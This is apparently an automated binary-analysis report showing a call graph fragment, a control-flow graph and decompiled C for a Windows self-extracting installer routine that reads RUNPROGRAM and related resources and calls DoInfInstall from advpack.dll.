112 Function_00131AE8 74->112 115 Function_00133FEF 74->115 75 Function_001372A2 76->6 76->59 76->65 76->106 77 Function_00136FA1 78->3 78->16 78->26 78->39 78->44 78->57 78->62 78->65 78->67 78->71 78->106 79 Function_00134CA0 80->48 81 Function_00136FA5 81->33 82 Function_00132CAA 82->3 82->51 82->56 82->67 82->71 82->73 82->106 118 Function_001336EE 82->118 84 Function_00132AAC 84->59 95 Function_001317C8 84->95 84->106 84->114 85 Function_00134AD0 85->60 86 Function_00134CD0 86->10 86->17 86->40 86->49 86->54 86->58 86->106 108 Function_001347E0 86->108 87->106 88 Function_00134CC0 89 Function_00134BC0 90 Function_001330C0 91 Function_001363C0 91->57 91->65 91->106 92->50 93->59 93->62 93->65 93->71 94->32 97 Function_001334F0 97->60 97->71 97->87 98 Function_00136EF0 99->8 99->52 99->70 99->82 101 Function_001370FE 102 Function_00134EFD 102->40 102->58 102->106 104->67 104->71 104->102 105->65 105->106 106->96 108->59 108->71 109 Function_001319E0 109->87 109->106 110->62 110->67 110->71 111 Function_001370EB 112->6 112->57 112->59 112->63 112->65 112->68 112->71 112->84 112->94 112->106 113 Function_001328E8 113->34 113->66 115->4 115->62 115->71 115->106 117 Function_00136BEF 118->5 118->66 118->71 118->92 118->106 118->113 119->106

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 36 133ba2-133bd9 37 133bdb-133bee call 13468f 36->37 38 133bfd-133bff 36->38 44 133d13-133d30 call 1344b9 37->44 45 133bf4-133bf7 37->45 40 133c03-133c28 memset 38->40 42 133d35-133d48 call 131781 40->42 43 133c2e-133c40 call 13468f 40->43 49 133d4d-133d52 42->49 43->44 54 133c46-133c49 43->54 56 133f4d 44->56 45->38 45->44 52 133d54-133d6c call 13468f 49->52 53 133d9e-133db6 call 131ae8 49->53 52->44 69 133d6e-133d75 52->69 53->56 67 133dbc-133dc2 53->67 54->44 58 133c4f-133c56 54->58 60 133f4f-133f63 call 136ce0 56->60 62 133c60-133c65 58->62 63 133c58-133c5e 58->63 65 133c67-133c6d 62->65 66 133c75-133c7c 62->66 64 133c6e-133c73 63->64 70 133c87-133c89 64->70 65->64 66->70 73 133c7e-133c82 66->73 71 133de6-133de8 67->71 72 133dc4-133dce 67->72 75 133d7b-133d98 CompareStringA 69->75 76 133fda-133fe1 69->76 70->49 78 133c8f-133c98 70->78 79 133f0b-133f15 call 133fef 71->79 80 133dee-133df5 71->80 72->71 77 133dd0-133dd7 72->77 73->70 75->53 75->76 81 133fe3 call 132267 76->81 82 133fe8-133fea 76->82 77->71 84 133dd9-133ddb 77->84 85 133cf1-133cf3 78->85 86 133c9a-133c9c 78->86 91 133f1a-133f1c 79->91 87 133fab-133fd2 call 1344b9 LocalFree 80->87 88 133dfb-133dfd 80->88 81->82 82->60 84->80 92 133ddd-133de1 call 13202a 84->92 85->53 90 133cf9-133d11 call 13468f 85->90 94 133ca5-133ca7 86->94 95 133c9e-133ca3 86->95 87->56 88->79 96 133e03-133e0a 88->96 90->44 90->49 98 133f46-133f47 LocalFree 91->98 99 133f1e-133f2d LocalFree 91->99 92->71 94->56 103 133cad 94->103 102 133cb2-133cc5 call 13468f 95->102 96->79 104 133e10-133e19 call 136495 96->104 98->56 106 133f33-133f3b 99->106 107 133fd7-133fd9 99->107 102->44 112 133cc7-133ce8 CompareStringA 102->112 103->102 113 133f92-133fa9 call 1344b9 104->113 114 133e1f-133e36 GetProcAddress 104->114 106->40 107->76 112->85 118 133cea-133ced 112->118 125 133f7c-133f90 LocalFree call 136285 113->125 115 133f64-133f76 call 1344b9 FreeLibrary 114->115 116 133e3c-133e80 114->116 115->125 119 133e82-133e87 116->119 120 133e8b-133e94 116->120 118->85 119->120 123 133e96-133e9b 120->123 124 133e9f-133ea2 120->124 123->124 128 133ea4-133ea9 124->128 129 133ead-133eb6 124->129 125->56 128->129 131 133ec1-133ec3 129->131 132 133eb8-133ebd 129->132 133 133ec5-133eca 131->133 134 133ece-133eec 131->134 132->131 133->134 137 133ef5-133efd 134->137 138 133eee-133ef3 134->138 139 133f40 FreeLibrary 137->139 140 133eff-133f09 FreeLibrary 137->140 138->137 139->98 140->99
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00133BA2() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				short _v300;
                                                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                                                    				void _v348;
                                                                                                                                                                                                    				char _v352;
                                                                                                                                                                                                    				intOrPtr _v356;
                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                    				short _v364;
                                                                                                                                                                                                    				char* _v368;
                                                                                                                                                                                                    				intOrPtr _v372;
                                                                                                                                                                                                    				void* _v376;
                                                                                                                                                                                                    				intOrPtr _v380;
                                                                                                                                                                                                    				char _v384;
                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                    				intOrPtr _v392;
                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                    				void* _v408;
                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                    				short _t96;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                    				int _t112;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				signed char _t118;
                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                    				short _t137;
                                                                                                                                                                                                    				char* _t140;
                                                                                                                                                                                                    				signed char _t144;
                                                                                                                                                                                                    				signed char _t145;
                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                    				_t69 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                    				 *0x139124 =  *0x139124 & 0;
                                                                                                                                                                                                    				_t149 = 0;
                                                                                                                                                                                                    				_v388 = 0;
                                                                                                                                                                                                    				_v384 = 0;
                                                                                                                                                                                                    				_t165 =  *0x138a28 - _t153; // 0x0
                                                                                                                                                                                                    				if(_t165 != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                    						if( *0x138c42 != 0) {
                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                    						_t115 = E0013468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                    							E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    							 *0x139124 = 0x80070714;
                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                    										_t76 = E00131AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                    											return E00136CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00133FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0x138580;
                                                                                                                                                                                                    													if( *0x138580 != 0) {
                                                                                                                                                                                                    														E00132267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0x138180;
                                                                                                                                                                                                    											if( *0x138180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E001344B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0x139124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x139a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00136495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E001344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0x139124 = E00136285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E001344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x138a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                    											_t96 =  *0x139a40; // 0x3
                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                    											_t97 =  *0x138a38 & 0x0000ffff;
                                                                                                                                                                                                    											_v380 = 0x139154;
                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                    											_v372 = 0x1391e4;
                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                    											if( *0x138a30 != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t144 =  *0x139a34; // 0x1
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t145 =  *0x138d48; // 0x0
                                                                                                                                                                                                    											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                    											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t145;
                                                                                                                                                                                                    											if(_t145 < 0) {
                                                                                                                                                                                                    												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                    												__eflags = _t104;
                                                                                                                                                                                                    												_v360 = _t104;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t98 =  *0x139a38; // 0x0
                                                                                                                                                                                                    											_v356 = _t98;
                                                                                                                                                                                                    											_t130 = _t146;
                                                                                                                                                                                                    											 *0x13a288( &_v384);
                                                                                                                                                                                                    											_t101 = _v404();
                                                                                                                                                                                                    											__eflags = _t164 - _t164;
                                                                                                                                                                                                    											if(_t164 != _t164) {
                                                                                                                                                                                                    												_t130 = 4;
                                                                                                                                                                                                    												asm("int 0x29");
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											 *0x139124 = _t101;
                                                                                                                                                                                                    											_push(_t129);
                                                                                                                                                                                                    											__eflags = _t101;
                                                                                                                                                                                                    											if(_t101 < 0) {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												goto L61;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												_t127 = _v400;
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0x139a40 - 1; // 0x3
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0x138a20;
                                                                                                                                                                                                    										if( *0x138a20 == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t157;
                                                                                                                                                                                                    										if(_t157 != 0) {
                                                                                                                                                                                                    											goto L38;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    										E0013202A(_t146); // executed
                                                                                                                                                                                                    										goto L37;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v280;
                                                                                                                                                                                                    									_t108 = E0013468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                    									__eflags = _t108;
                                                                                                                                                                                                    									if(_t108 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x138c42;
                                                                                                                                                                                                    									if( *0x138c42 != 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                    									__eflags = _t112 == 0;
                                                                                                                                                                                                    									if(_t112 == 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L31;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t118 =  *0x138a38; // 0x0
                                                                                                                                                                                                    								if(_t118 == 0) {
                                                                                                                                                                                                    									L23:
                                                                                                                                                                                                    									if(_t153 != 0) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E0013468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                    										goto L27;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L25;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                    									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                    									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "USRQCMD";
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E0013468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                    										_t153 = 1;
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = "ADMQCMD";
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                    						_push(_t130);
                                                                                                                                                                                                    						_t146 = 0x104;
                                                                                                                                                                                                    						E00131781( &_v276, 0x104, _t130, 0x138c42);
                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t130 = "REBOOT";
                                                                                                                                                                                                    				_t125 = E0013468F(_t130, 0x139a2c, 4);
                                                                                                                                                                                                    				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





























































                                                                                                                                                                                                    0x00133baa
                                                                                                                                                                                                    0x00133bb0
                                                                                                                                                                                                    0x00133bb7
                                                                                                                                                                                                    0x00133bc0
                                                                                                                                                                                                    0x00133bc2
                                                                                                                                                                                                    0x00133bc9
                                                                                                                                                                                                    0x00133bcb
                                                                                                                                                                                                    0x00133bcf
                                                                                                                                                                                                    0x00133bd3
                                                                                                                                                                                                    0x00133bd9
                                                                                                                                                                                                    0x00133bfd
                                                                                                                                                                                                    0x00133bfd
                                                                                                                                                                                                    0x00133bff
                                                                                                                                                                                                    0x00133c03
                                                                                                                                                                                                    0x00133c03
                                                                                                                                                                                                    0x00133c11
                                                                                                                                                                                                    0x00133c16
                                                                                                                                                                                                    0x00133c19
                                                                                                                                                                                                    0x00133c28
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c30
                                                                                                                                                                                                    0x00133c39
                                                                                                                                                                                                    0x00133c40
                                                                                                                                                                                                    0x00133d13
                                                                                                                                                                                                    0x00133d15
                                                                                                                                                                                                    0x00133d21
                                                                                                                                                                                                    0x00133d26
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c4f
                                                                                                                                                                                                    0x00133c56
                                                                                                                                                                                                    0x00133c60
                                                                                                                                                                                                    0x00133c65
                                                                                                                                                                                                    0x00133c77
                                                                                                                                                                                                    0x00133c78
                                                                                                                                                                                                    0x00133c7c
                                                                                                                                                                                                    0x00133c7e
                                                                                                                                                                                                    0x00133c82
                                                                                                                                                                                                    0x00133c82
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c7c
                                                                                                                                                                                                    0x00133c67
                                                                                                                                                                                                    0x00133c69
                                                                                                                                                                                                    0x00133c6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c58
                                                                                                                                                                                                    0x00133c58
                                                                                                                                                                                                    0x00133c6e
                                                                                                                                                                                                    0x00133c6e
                                                                                                                                                                                                    0x00133c87
                                                                                                                                                                                                    0x00133c89
                                                                                                                                                                                                    0x00133d4d
                                                                                                                                                                                                    0x00133d4f
                                                                                                                                                                                                    0x00133d50
                                                                                                                                                                                                    0x00133d52
                                                                                                                                                                                                    0x00133d9e
                                                                                                                                                                                                    0x00133da8
                                                                                                                                                                                                    0x00133daf
                                                                                                                                                                                                    0x00133db4
                                                                                                                                                                                                    0x00133db6
                                                                                                                                                                                                    0x00133f4d
                                                                                                                                                                                                    0x00133f4d
                                                                                                                                                                                                    0x00133f4f
                                                                                                                                                                                                    0x00133f56
                                                                                                                                                                                                    0x00133f57
                                                                                                                                                                                                    0x00133f58
                                                                                                                                                                                                    0x00133f63
                                                                                                                                                                                                    0x00133f63
                                                                                                                                                                                                    0x00133dbc
                                                                                                                                                                                                    0x00133dc0
                                                                                                                                                                                                    0x00133dc2
                                                                                                                                                                                                    0x00133de6
                                                                                                                                                                                                    0x00133de6
                                                                                                                                                                                                    0x00133de8
                                                                                                                                                                                                    0x00133f0b
                                                                                                                                                                                                    0x00133f0b
                                                                                                                                                                                                    0x00133f0f
                                                                                                                                                                                                    0x00133f13
                                                                                                                                                                                                    0x00133f15
                                                                                                                                                                                                    0x00133f1a
                                                                                                                                                                                                    0x00133f1c
                                                                                                                                                                                                    0x00133f46
                                                                                                                                                                                                    0x00133f47
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f47
                                                                                                                                                                                                    0x00133f1e
                                                                                                                                                                                                    0x00133f1f
                                                                                                                                                                                                    0x00133f25
                                                                                                                                                                                                    0x00133f26
                                                                                                                                                                                                    0x00133f2a
                                                                                                                                                                                                    0x00133f2d
                                                                                                                                                                                                    0x00133fd9
                                                                                                                                                                                                    0x00133fd9
                                                                                                                                                                                                    0x00133fda
                                                                                                                                                                                                    0x00133fda
                                                                                                                                                                                                    0x00133fe1
                                                                                                                                                                                                    0x00133fe3
                                                                                                                                                                                                    0x00133fe3
                                                                                                                                                                                                    0x00133fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133fe8
                                                                                                                                                                                                    0x00133f33
                                                                                                                                                                                                    0x00133f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f37
                                                                                                                                                                                                    0x00133dee
                                                                                                                                                                                                    0x00133dee
                                                                                                                                                                                                    0x00133df5
                                                                                                                                                                                                    0x00133fad
                                                                                                                                                                                                    0x00133fb9
                                                                                                                                                                                                    0x00133fc2
                                                                                                                                                                                                    0x00133fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133fc8
                                                                                                                                                                                                    0x00133dfb
                                                                                                                                                                                                    0x00133dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133e03
                                                                                                                                                                                                    0x00133e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133e15
                                                                                                                                                                                                    0x00133e17
                                                                                                                                                                                                    0x00133e19
                                                                                                                                                                                                    0x00133f94
                                                                                                                                                                                                    0x00133fa4
                                                                                                                                                                                                    0x00133f7c
                                                                                                                                                                                                    0x00133f80
                                                                                                                                                                                                    0x00133f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f8b
                                                                                                                                                                                                    0x00133e2c
                                                                                                                                                                                                    0x00133e30
                                                                                                                                                                                                    0x00133e34
                                                                                                                                                                                                    0x00133e36
                                                                                                                                                                                                    0x00133f69
                                                                                                                                                                                                    0x00133f6e
                                                                                                                                                                                                    0x00133f70
                                                                                                                                                                                                    0x00133f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f76
                                                                                                                                                                                                    0x00133e3c
                                                                                                                                                                                                    0x00133e43
                                                                                                                                                                                                    0x00133e47
                                                                                                                                                                                                    0x00133e52
                                                                                                                                                                                                    0x00133e56
                                                                                                                                                                                                    0x00133e5c
                                                                                                                                                                                                    0x00133e61
                                                                                                                                                                                                    0x00133e68
                                                                                                                                                                                                    0x00133e70
                                                                                                                                                                                                    0x00133e74
                                                                                                                                                                                                    0x00133e7c
                                                                                                                                                                                                    0x00133e80
                                                                                                                                                                                                    0x00133e82
                                                                                                                                                                                                    0x00133e82
                                                                                                                                                                                                    0x00133e87
                                                                                                                                                                                                    0x00133e87
                                                                                                                                                                                                    0x00133e8b
                                                                                                                                                                                                    0x00133e91
                                                                                                                                                                                                    0x00133e94
                                                                                                                                                                                                    0x00133e96
                                                                                                                                                                                                    0x00133e96
                                                                                                                                                                                                    0x00133e9b
                                                                                                                                                                                                    0x00133e9b
                                                                                                                                                                                                    0x00133e9f
                                                                                                                                                                                                    0x00133ea2
                                                                                                                                                                                                    0x00133ea4
                                                                                                                                                                                                    0x00133ea4
                                                                                                                                                                                                    0x00133ea9
                                                                                                                                                                                                    0x00133ea9
                                                                                                                                                                                                    0x00133ead
                                                                                                                                                                                                    0x00133eb3
                                                                                                                                                                                                    0x00133eb6
                                                                                                                                                                                                    0x00133eb8
                                                                                                                                                                                                    0x00133eb8
                                                                                                                                                                                                    0x00133ebd
                                                                                                                                                                                                    0x00133ebd
                                                                                                                                                                                                    0x00133ec1
                                                                                                                                                                                                    0x00133ec3
                                                                                                                                                                                                    0x00133ec5
                                                                                                                                                                                                    0x00133ec5
                                                                                                                                                                                                    0x00133eca
                                                                                                                                                                                                    0x00133eca
                                                                                                                                                                                                    0x00133ece
                                                                                                                                                                                                    0x00133ed5
                                                                                                                                                                                                    0x00133ed9
                                                                                                                                                                                                    0x00133ee0
                                                                                                                                                                                                    0x00133ee6
                                                                                                                                                                                                    0x00133eea
                                                                                                                                                                                                    0x00133eec
                                                                                                                                                                                                    0x00133eee
                                                                                                                                                                                                    0x00133ef3
                                                                                                                                                                                                    0x00133ef3
                                                                                                                                                                                                    0x00133ef5
                                                                                                                                                                                                    0x00133efa
                                                                                                                                                                                                    0x00133efb
                                                                                                                                                                                                    0x00133efd
                                                                                                                                                                                                    0x00133f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133eff
                                                                                                                                                                                                    0x00133eff
                                                                                                                                                                                                    0x00133f05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f05
                                                                                                                                                                                                    0x00133efd
                                                                                                                                                                                                    0x00133dc7
                                                                                                                                                                                                    0x00133dce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133dd0
                                                                                                                                                                                                    0x00133dd7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
